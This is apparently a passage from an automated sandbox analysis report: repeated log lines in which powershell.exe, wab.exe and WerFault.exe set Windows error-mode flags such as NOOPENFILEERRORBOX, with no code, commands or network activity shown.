              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
